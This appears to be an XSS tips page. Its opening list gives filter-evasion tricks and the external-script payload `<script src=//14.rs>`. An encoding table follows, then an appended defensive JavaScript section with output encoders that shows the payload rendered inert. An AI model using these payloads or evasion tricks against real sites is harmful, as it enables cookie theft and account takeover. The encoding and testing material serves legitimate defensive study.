XSS Tips
Tips & Tricks
- `http(s)://` can be shortened to `//` or `/\\` or `\\`.
- `document.cookie` can be shortened to `cookie`. It applies to other DOM objects as well.
- `alert` and other pop-up functions don't need a value, so stop doing `alert('XSS')` and start doing `alert()`.
- You can use `//` to close a tag instead of `>`.
- I have found that `confirm` is the least detected pop-up function so stop using `alert`.
- Quotes around an attribute value aren't necessary as long as the value doesn't contain spaces. You can use `<script src=//14.rs>` instead of `<script src="//14.rs">`.
- The shortest HTML context XSS payload is `<script src=//14.rs>` (19 chars).
Awesome Encoding
| HTML | Char | Numeric | Description | Hex | CSS (ISO) | JS (Octal) | URL |
|---|---|---|---|---|---|---|---|
|  | " |  | quotation mark | u+0022 | \0022 | \42 | %22 |
|  | # |  | number sign | u+0023 | \0023 | \43 | %23 |
|  | $ |  | dollar sign | u+0024 | \0024 | \44 | %24 |
|  | % |  | percent sign | u+0025 | \0025 | \45 | %25 |
|  | & |  | ampersand | u+0026 | \0026 | \46 | %26 |
|  | ' |  | apostrophe | u+0027 | \0027 | \47 | %27 |
|  | ( |  | left parenthesis | u+0028 | \0028 | \50 | %28 |
|  | ) |  | right parenthesis | u+0029 | \0029 | \51 | %29 |
|  | * |  | asterisk | u+002A | \002a | \52 | %2A |
|  | + |  | plus sign | u+002B | \002b | \53 | %2B |
|  | , |  | comma | u+002C | \002c | \54 | %2C |
|  | - |  | hyphen-minus | u+002D | \002d | \55 | %2D |
|  | . |  | full stop; period | u+002E | \002e | \56 | %2E |
|  | / |  | solidus; slash | u+002F | \002f | \57 | %2F |
|  | : |  | colon | u+003A | \003a | \72 | %3A |
|  | ; |  | semicolon | u+003B | \003b | \73 | %3B |
|  | < |  | less-than | u+003C | \003c | \74 | %3C |
|  | = |  | equals | u+003D | \003d | \75 | %3D |
|  | > |  | greater-than sign | u+003E | \003e | \76 | %3E |
|  | ? |  | question mark | u+003F | \003f | \77 | %3F |
|  | @ |  | at sign; commercial at | u+0040 | \0040 | \100 | %40 |
|  | [ |  | left square bracket | u+005B | \005b | \133 | %5B |
|  | \ |  | backslash | u+005C | \005c | \134 | %5C |
|  | ] |  | right square bracket | u+005D | \005d | \135 | %5D |
|  | ^ |  | circumflex accent | u+005E | \005e | \136 | %5E |
|  | _ |  | low line | u+005F | \005f | \137 | %5F |
|  | ` |  | grave accent | u+0060 | \0060 | \140 | %60 |
|  | { |  | left curly bracket | u+007B | \007b | \173 | %7B |
|  | \| |  | vertical bar | u+007C | \007c | \174 | %7C |
|  | } |  | right curly bracket | u+007D | \007d | \175 | %7D |
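The encodings in the table above are exactly what a defender's output encoder has to produce. The following is an added example (not code from the original page): small context-aware encoders that generate the table's Hex, CSS, JS (Octal) and URL forms for any non-alphanumeric ASCII character, plus a check that the page's shortest payload is inert once it has been HTML-encoded. The `encodeJsSafe` variant is an assumption of mine, added because legacy octal escapes are rejected in strict-mode JavaScript.

```javascript
// Added example, not part of the original page. Runs offline under Node.js.
const SPECIAL = /[^A-Za-z0-9]/g; // encode everything outside [A-Za-z0-9]

// HTML context: numeric character reference, e.g. "<" -> "&#x3c;".
function encodeHtml(s) {
  return s.replace(SPECIAL, (c) => `&#x${c.charCodeAt(0).toString(16)};`);
}

// CSS context: ISO-style "\XXXX" with 4 lower-case hex digits, as in the table.
// Sufficient for code points below U+FFFF; CSS allows up to 6 digits.
function encodeCss(s) {
  return s.replace(SPECIAL, (c) => `\\${c.charCodeAt(0).toString(16).padStart(4, "0")}`);
}

// JS string context, table form: legacy octal escape "\NNN" (e.g. "<" -> "\74").
// Caveat: octal escapes are a SyntaxError in strict mode, ES modules and
// template literals, so a defender should emit "\xHH" instead (encodeJsSafe).
function encodeJsOctal(s) {
  return s.replace(SPECIAL, (c) => `\\${c.charCodeAt(0).toString(8)}`);
}
function encodeJsSafe(s) {
  return s.replace(SPECIAL, (c) => `\\x${c.charCodeAt(0).toString(16).padStart(2, "0").toUpperCase()}`);
}

// URL context: percent-encoding with upper-case hex, as in the table.
function encodeUrl(s) {
  return s.replace(SPECIAL, (c) => `%${c.charCodeAt(0).toString(16).padStart(2, "0").toUpperCase()}`);
}

// One row of the "Awesome Encoding" table for a single character.
function encodingRow(ch) {
  const cp = ch.charCodeAt(0);
  return {
    hex: `u+${cp.toString(16).padStart(4, "0").toUpperCase()}`,
    css: encodeCss(ch),
    js: encodeJsOctal(ch),
    url: encodeUrl(ch),
  };
}

// True when none of the characters an HTML parser acts on survive encoding.
function isHtmlInert(s) {
  return !/[<>"'=\/]/.test(s);
}

// The 19-char payload quoted on the page, used here only as test input.
const PAYLOAD = "<script src=//14.rs>";
```

`encodeHtml(PAYLOAD)` yields `&#x3c;script&#x20;src&#x3d;&#x2f;&#x2f;14&#x2e;rs&#x3e;`, which a browser renders as text rather than as a tag.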